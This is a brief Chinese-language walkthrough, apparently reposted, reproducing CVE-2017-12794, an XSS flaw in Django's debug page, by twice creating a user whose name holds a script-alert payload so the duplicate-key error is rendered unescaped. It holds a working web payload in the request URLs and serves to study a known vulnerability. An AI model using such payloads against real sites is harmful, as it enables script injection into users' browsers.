Django debug page XSS漏洞(CVE-2017-12794)

时间  2020-08-05
标签 django debug page xss 漏洞 cve 栏目 Python 繁體版
原文   原文链接

1.建立个用户:ip:8000/create_user/?username=<script>alert(7)</script>xss

在这里插入图片描述

显示用户已建立。
2.触发漏洞,再次访问ip:8000/create_user/?username=<script>alert(7)</script>ide

在这里插入图片描述

3.触发异常:code

duplicate key value violates unique constraint "xss_user_username_key"
DETAIL: Key (username)=(<script>alert(7)</script>) already exists.

在这里插入图片描述

4.这个异常被拼接进The above exception ({{ frame.exc_cause }}) was the direct cause of the following exception,最后触发XSS。图片

相关文章
相关标签/搜索
每日一句
    每一个你不满意的现在,都有一个你没有努力的曾经。
本站公众号
   欢迎关注本站公众号,获取更多信息
联系我们 最近搜索 最新文章 沪ICP备13005482号-10 MyBatis教程 SQL 教程 MySQL教程 Java 教程 Thymeleaf 教程 Hibernate教程 Spring教程 Redis教程